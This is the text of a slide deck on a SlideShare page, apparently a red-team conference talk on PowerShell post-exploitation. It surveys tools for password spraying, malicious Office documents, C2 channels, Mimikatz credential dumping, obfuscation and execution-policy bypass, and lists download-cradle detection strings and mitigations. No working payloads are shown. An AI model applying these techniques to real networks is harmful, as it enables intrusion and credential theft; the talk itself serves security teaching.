SlideShare ist ein Scribd-Unternehmen logo

PowerShell Post-Exploitation Techniques

Arthur Paixão
Arthur Paixão

This document provides an overview of using PowerShell for offensive security purposes. It discusses PowerShell syntax, common commands, and various open source tools and frameworks like PowerSploit, Empire, BloodHound, and Nishang that can be used for tasks like reconnaissance, gaining access, maintaining access, and privilege escalation on Windows systems. The document also provides examples of using PowerShell to bypass execution policies and obfuscate scripts to avoid detection.

Technologie
1 von 62
Downloaden Sie, um offline zu lesen
FROM TO P 0 W 3 R S H 3 L L ArthurPaixão_ PS C:>
PS C:> whoami.ps1_ • Arthur Paixão • Red Team Security Specialist – C6 Bank • Information Security - UNIFG • Analysis Systems Development – UNIBRATEC • Made in Recife #Oxem? #TuVisse? • Security Research at #RTFM
PS C:> Powershell.exe KEEP CALM AND LEARN POWERSHELL
PS C:> overview.ps1_ Why use Powershell? Native on Windows .NET Framework Easy to learn Execute code in memory Command- line Shell and Script PowerShell ISE
PS C:> syntax-overview.ps1_ Poweliks Kovter (mshta or rundll + ActiveXObject) Registry: .ps1 .vbs .bat Scheduled task File: Word Excel Macros: PowerShell Remoting PsExec WMI Remotely:
PS C:> syntax-overview.ps1_ String “abc” “123” “abc123” Integer 1,2,3,4,5 Boolean $True $False Variable $url $qualquercoisa
PS C:> syntax-overview.ps1_ OBJECTS Properties Methods ARRAYS $list = “From”, “Power”, “To”, “Shell” $list[0] $list[1] $list[2] $list[3] “From Power To Shell” CMDLETS Always in a “verb-noun” format get-process get-eventlog write-host set-clipboard
PS C:> syntax-overview.ps1_ Basic CmdLets PowerShell PowerShell Alias CMD *nix Get-ChildItem ls, gci, dir dir ls Copy-Item cp, copy, cpi copy cp Move-Item move, mv, mi move mv Select-String sls find, findstr grep Get-Help man, help help man Get-Content cat, gcc, type type cat
PS C:> syntax-overview.ps1_ • Creates a new resource New • Modifies an existing resource Set- • Retrieves an existing resource Get- • Gets information from a source, such as a file Read- • Used to look for an object Find- • Used to create a reference to a resource Search- • (asynchronous) begin an operation, such as starting a process Start- • (synchronous) perform an operation such as running a command Invoke-
PS C:> syntax-verview.ps1_ Get-Help Default output isn’t really useful Get-Help ls –ex Get-Help ls -Full Get-Command Very useful for find cmdlet Get-Command Get-Help Get-Command Set-Acl
PS C:> get-ExecutionPolicy.ps1_ Execution Policy Not Security Policy !=
PS C:> Invoke-BypassExecutionPolicy.ps1_ • Runme.ps1 • Write-Host "My voice is my passport, verify me."
PS C:> Powershell.exe RED TEAM != BLUE TEAM
PS C:> Get-Help-RedTeam.ps1_ • PowerShell is what the admins use to manage their infrastructure; • Standard on Windows 7 and up; • Microsoft is pushing more and more tasks into PowerShell; • PowerShell can be used in every part of the attack lifecycle; • Access to entire .NET and WMI frameworks; • Lots of very interesting offensive projects going on;
PS C:> Get-Help-BlueTeam.ps1_ • It’s what the bad guys (RedTeams) are using; • There’s some really cool DFIR stuff going on with Powershell; • Module Logging (v3); • Script Block Logging (v5); • Full Transcription Logging (v2, impoved in v5); • Preventing and Monitore downgrade attacks; • Monitor and alert on certain strings/commands in command line arguments for powershell.exe • -EncodedCommand • (New-Object Net.WebClient).DownloadString PS C:> Get-Help-BlueTeam.ps1_ • It’s what the bad guys (RedTeams) are using; • There’s some really cool DFIR stuff going on with Powershell; • Module Logging (v3); • Script Block Logging (v5); • Full Transcription Logging (v2, impoved in v5); • Preventing and Monitore downgrade attacks; • Monitor and alert on certain strings/commands in command line arguments for powershell.exe • -EncodedCommand • (New-Object Net.WebClient).DownloadString
PS C:> Get-Attack-Scenario.ps1 ATT&CK += PENTESTING PHASES
PS C:> Get-Attack-Scenario.ps1_ Reconnaissance Scanning Gaining Access Maintaining Access Covering Tracks Reporting Scanning += Remote Attacks PPP – Phishing Powshell Payloads Command and Control Privilege Escalation Network Exploitation += Domain Exploitation Post Exploitation
PS C:> Get-Attack.ps1 SCANNING += REMOTE ATTACKS
PS C:> PSNmap.ps1_ • Linux nmap for PowerShell (almost). • Ping sweeps and scans a network for specified open ports. • Can also perform DNS lookups. • Author(s) • @joakimbs • https://www.powershellgallery.com/packages/PSnmap/1.2
PS C:> PowerMeta.ps1_ • Discover publicly available files • Extract Metadata from them • Can provide information about: • The internal username schema • System names • Domain info • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/PowerMeta Full Names Possible Username
PS C:> OWAAttackFlow.ps1_ Starting With Nothing and 100% Remote Reconnaissance OWA Target Aquisition Internal Domain Enumeration Username Contention Discovery Username Enumeration Password Spraying Acquire Global Address List More Password Spraying 2FA Bypass to Search Email Congratulation, now you're H4ck3R!!!
PS C:> MailSniper.ps1_ • Enumerate users/domain • Password spray OWA/EWS • Get Global Address List • Search email for certain terms • Passwords • Find VPN info • Reset 2FA keys or add new device • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/MailSniper
PS C:> Get-Attack.ps1 PPP – PHISHING POWERSHELL PAYLOADS
PS C:> PowerShell-Empire.ps1_ • PowerShell post-exploitation agent • Aims to provide a rapidly extensible platform to integrate offensive/defensive PowerShell work • Many capabilities: • Stagers/payloads, Lateral movement, persistence, etc. • Author(s): • Will Schroeder (@harmj0y) • Justin Warner (@sixdub) • Matt Nelson (@enigma0x3) • www.powershellempire.com
PS C:> LuckyStrike.ps1_ • PowerShell based generator of malicious .doc and .xls documents; • All payloads are saved into a database for easy retrieval & embedding into a new or existing document; • Is a menu-driven PowerShell script that uses a sqlite database to store your payloads, code block dependencies, and working sessions in order to generate malicious documents. • Author(s): • Jason Lang (@curi0usJack) • https://github.com/curi0usJack/luckystrike
PS C:> Get-Attack.ps1 COMMAND AND CONTROL
PS C:> Invoke-C&C.ps1_ • Powercat - PowerShell version of Netcat; • Author(s): • Mick Douglas (@besimorhino), Luke Baggett & Jesse Davis (@secabstraction) • https://github.com/secabstraction/PowerCat • Invoke-PowerShellIcmp – C2 channel over ICMP echoes and replies; • Author(s): • Nikhil Mittal (@samratashok) • https://github.com/samratashok/nishang/blob/master/ Shells/Invoke- PowerShellIcmp.ps1 • Dnscat2-PowerShell – C2 channel over DNS requests; • Author(s): • Ron Bowes (@iagox86) • https://github.com/lukebaggett/dnscat2-powershell
PS C:> Get-Attack.ps1 PRIVILEGE ESCALATION
PS C:> PowerUp.ps1_ • Performs a number of local privilege escalation checks • Checks for: • Unquoted service paths • Unattended Install Files • Service Permissions • Author(s): • Will Schroeder (@harmj0y) • https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
PS C:> PowerUpSQL.ps1_ • SQL server discovery • Audit weak configurations • Perform privilege escalation to obtain SA privileges • Find sensitive data at scale • Attacks Funcions: • Invoke-SQLDumpInfo • Invoke-SQLAudit • Invoke-SQLEscalatePriv • Author(s): • ScottSutherland(@_nullbind) • https://github.com/NetSPI/PowerUpSQL
PS C:> Get-Attack.ps1 DOMAIN EXPLOITATION
PS C:> Get-GPPPassword.ps1_ • Finds any passwords of accounts set by GPP • Usually the first thing I check • Almost always find an admin password here • Author(s): • Chris Campbell (@obscuresec) • https://github.com/PowerShellMafia/PowerSplo it/blob/master/Exfiltration/Get- GPPPassword.ps1
PS C:> BloodHound.ps1_ • Enumerates/Gathers: • Local admins group on all systems • Active user sessions on each system • Group membership information • Domain trusts info • Find a path to domain admin • Authors(s): • Andrew Robbins (@_wald0), Will Schroeder (@harmj0y) and Rohan Vazarkar (@CptJesus) • https://github.com/BloodHoundAD/BloodHound • https://github.com/SadProcessor/SomeStuff/blob/ master/BloodHoundw64_LTI.ps1 [Windows Edition]
PS C:> Find-LocalAdminAccess.ps1_ • Find a system on the network your user is a local admin of; • Author(s): • Will Schroeder (@harmj0y) • https://github.com/Powe rShellMafia/PowerSploit/ blob/master/Recon/Powe rView.ps1
PS C:> Find-LocalAdminAccess.ps1_ • Tool for password spraying all domain users • Common Scenario: • Domain locks out accounts after a certain number of failed logins • Can’t brute force • Solution: • Try a number of passwords less than the domain lockout policy against EVERY account in the domain • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/Do mainPasswordSpray
PS C:> Get-Attack.ps1 POST EXPLOITATION
PS C:> Invoke-Mimikatz.ps1_ • Dump cleartext credentials • Avoids writing to disk • Could sneakily dump creds from LSASS dumps from other systems • Author(s): • Joe Bialek (@JosephBialek) • Benjamin Delpy (@gentilkiwi) • https://raw.githubusercontent.com/PowerShellMafia/Power Sploit/master/Exfiltration/Invoke-Mimikatz.ps1
PS C:> Invoke-ShareFinder.ps1_ • Sensitive files on shares? • ShareFinder then FileFinder • FileFinder will find files with the following strings in their title: • ‘*pass*’, ‘*sensitive*’, ‘*admin*’, ‘*secret*’, ‘*login*’, ‘*unattend*.xml’, ‘*.vmdk’, ‘*creds*’, or ‘*credential*’ • Author(s): • Will Schroeder (@harmj0y)
PS C:> Invoke-Fr0mP0werT0Sh3ll.ps1 F#CK REPETITION!
PS C:> Get-P0werTricks.ps1_ Powershell Without Powershell Execution Policy Bypass Obfuscation Payloads CheatTools
PS C:> Get-P0werTricks.ps1_ Powershell Without Powershell Execution Policy Bypass Obfuscation Payloads CheatTools
PS C:> PowerOps.exe_ • C# application that has many • PowerShell scripts built in: • PowerSploit • Nishang • GPPPassword • Empire • PowerCat • Author(s): • Rui Reis (@fdiskyou) • https://github.com/fdiskyou/PowerOPS
PS C:> PowerShdll.ps1_ • Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls. • Requirements: • .Net v3.5 for dll mode. • .Net v2.0 for exe mode. • https://github.com/p3nt4/PowerShdll DLL Mode: EXE Mode:
PS C:> PowerLessShell.py_ • PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach. • To add another layer of crap the payload will copy msbuild.exe to something random and build the payload using the randomly generated binary. • You can provide -knownprocess switch to use known Windows process name instead of renaming MsBuild.exe to something random • https://github.com/Mr-Un1k0d3r/PowerLessShell
PS C:> Get-P0werTricks.ps1_ Powershell Without Powershell Execution Policy Bypass Obfuscation Payloads CheatTools
PS C:> Invoke-BypassExecutionPolicy.ps1_ • Paste the Script into an Interactive PowerShell Console: • Use the Command Switch:
PS C:> Invoke-BypassExecutionPolicy.ps1_ • Use the Invoke-Command Command: • Use the Invoke-Expression Command:
PS C:> Invoke-BypassExecutionPolicy.ps1_ • Set the ExcutionPolicy for the CurrentUser Scope via the Registry • https://blog.netspi.com/15-ways-to-bypass-the- powershell-execution-policy/ • https://docs.microsoft.com/en- us/powershell/module/microsoft.powershell.security/set- executionpolicy?view=powershell-5.1
PS C:> Get-P0werTricks.ps1_ Powershell Without Powershell Execution Policy Bypass Obfuscation Payloads CheatTools
PS C:> S3t-0+‘B’+fu$C4t|0n.ps1_ • Command line args are what most monitoring tools alert on when powershell.exe is run • ‘LeT’+’s’+’ob’+’FusCa’+’te’ • Encode, concatenate, reorder, etc. • Author(s): • Daniel Bohannon (@danielbohannon) • https://github.com/danielbohannon/Invoke-Obfuscation
PS C:> ISESteriods.ps1_ • ISESteroids 2.5.1.0 now ships with a PowerShell obfuscator that can scramble your code and make it hard to reverse- engineer; • To obfuscate a script, simply load a script and choose Tools/Obfuscate; • Dialog where you can set the level of obfuscation; • http://www.powertheshell.com/powershell-obfuscator/
PS C:> Get-P0werTricks.ps1_ Powershell Without Powershell Execution Policy Bypass Obfuscation Payloads CheatTools
PS C:> Nishang.ps1_ • Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. • Nishang is useful during all phases of penetration testing. • ActiveDirectory • Antak - the Webshell • Backdoor • Bypass • Clients • Escalation • MITM • Pivot • https://github.com/samratashok/nishang
PS C:> PowerSploit.ps1_ • PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: • Recon / CodeExecution • ScriptModification • Persistence • AntivirusBypass • Exfiltration • Mayhen =) • PrivEsc • https://github.com/PowerShellMafia/Po werSploit
PS C:> PS>Attack.ps1_ • PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. • It's designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. • Contains over 100 commands for Privilege Escalation, Recon and Data Exfilitration. It does this by including the following modules and commands: • PowerSploit • Nishang • Powercat • Inveigh • Invoke-TheHash • https://github.com/jaredhaight/PSAttack
PS C:> Get-Mitigation.ps1 SURPRISE, YOU’RE BUSTED! DOU YOU REALLY?
PS C:> Get-Mitigation.ps1_ •cmd.exe •PowerShell.exe •PowerShell_ISE.exe Disable: Use AppWhitelisting. Use Sysmon to monitor and alert for System.Management.Automation.dll Could possibly disable csc.exe compilation tool. Remove PowerShell v2 and Install PowerShell v5. Constrained Language Mode
PS C:> Get-Mitigation.ps1_ • Possible Bypass! Disable: • Possible Bypass! Use AppWhitelisting. • Possible Bypass! Use Sysmon to monitor and alert for System.Management.Automation.dll • Dangerous! Could possibly disable csc.exe compilation tool. Remove PowerShell v2 and Install PowerShell v5. • PS C:> $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage" Constrained Language Mode
PS C:> Get-Mitigation.ps1_ • https://goo.gl/fPCiJn Add Power to your PowerShell @techmentorevents • https://github.com/WiredPulse/PowerShell PowerScripts @WiredPulse • https://github.com/WiredPulse/PoSh-R2 PoSh-R2 @WiredPulse • https://github.com/sans-blue-team/DeepBlueCLI DeepBlueCLI @sans-blue-team • https://github.com/davehull/Kansa Kansas @davehull • https://github.com/mattifestation/PowerShellArsenal PowerShellArsenal @MattGraeber
THAT’S ALL FOLKS! Suggestions? Questions?
C6BANK.GUPY.IO PORTAL DE VAGAS:
PS C:> Invoke-References.ps1_ • https://github.com/PowerShellMafia/PowerSp loit/tree/dev/ • https://gallery.technet.microsoft.com/Net- Cease-Blocking-Net-1e8dcb5b • https://gallery.technet.microsoft.com/SAMRi1 0-Hardening-Remote-48d94b5b • https://github.com/davehull/Kansa • https://github.com/Invoke-IR/Uproot • https://github.com/mattifestation/PowerShell Arsenal • https://github.com/mattifestation/PSReflect • https://github.com/PowerShellEmpire/PowerT ools/tree/master/PowerPick • https://pt.slideshare.net/dafthack/pwning- the-enterprise-with-powershell • http://lockboxx.blogspot.com.br/2016/03/po wershell-for-pentesters-course.html • https://media.blackhat.com/eu- 13/briefings/Mittal/bh-eu-13-powershell-for- penetration-mittal-slides.pdf • https://www.psattack.com/presentations/get- help-an-intro-to-powershell-and-how-to-use- it-for-evil/ • https://pt.slideshare.net/harmj0y/catch-me-if- you-can-powershell-red-vs-blue • https://pt.slideshare.net/harmj0y/building-an- empire-with-powershell • https://www.youtube.com/watch?v=uE8IAxM _BhE

Empfohlen

Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersNikhil Mittal
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion TechniquesJason Lang
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usagedjenoalbania
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 

Empfohlen

Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersNikhil Mittal
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion TechniquesJason Lang
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usagedjenoalbania
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"Will Schroeder
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Shahriman .
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSCsaba Fitzl
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store appsCsaba Fitzl
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Tools kali
Tools kaliTools kali
Tools kaliketban0702
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration TestersChris Gates
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 

Weitere ähnliche Inhalte

Was ist angesagt?

Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Shahriman .
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSCsaba Fitzl
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store appsCsaba Fitzl
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration TestersChris Gates
 

Was ist angesagt? (20)

Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Power of linked list
Power of linked listPower of linked list
Power of linked list
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOS
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store apps
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop
 
Tools kali
Tools kaliTools kali
Tools kali
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
 

Ähnlich wie PowerShell Post-Exploitation Techniques

Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
Hogy jussunk ki lezárt hálózatokból?
Hogy jussunk ki lezárt hálózatokból?Hogy jussunk ki lezárt hálózatokból?
Hogy jussunk ki lezárt hálózatokból?hackersuli
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2Royce Davis
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
 
PowerShell Defcon for Cybersecurity Topics
PowerShell Defcon for Cybersecurity TopicsPowerShell Defcon for Cybersecurity Topics
PowerShell Defcon for Cybersecurity TopicsDev 010101
 
24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAsKellyn Pot'Vin-Gorman
 
PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopersBryan Cafferky
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesLeo Loobeek
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsGianluca Varisco
 
Malware Analysis Using Free Software
Malware Analysis Using Free SoftwareMalware Analysis Using Free Software
Malware Analysis Using Free SoftwareXavier Mertens
 
Enemy at the gates: vulnerability research in embedded appliances
Enemy at the gates: vulnerability research in embedded appliances Enemy at the gates: vulnerability research in embedded appliances
Enemy at the gates: vulnerability research in embedded appliances Chris Hernandez
 
$kernel->infect(): Creating a cryptovirus for Symfony2 apps
$kernel->infect(): Creating a cryptovirus for Symfony2 apps$kernel->infect(): Creating a cryptovirus for Symfony2 apps
$kernel->infect(): Creating a cryptovirus for Symfony2 appsRaul Fraile
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 

Ähnlich wie PowerShell Post-Exploitation Techniques (20)

Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
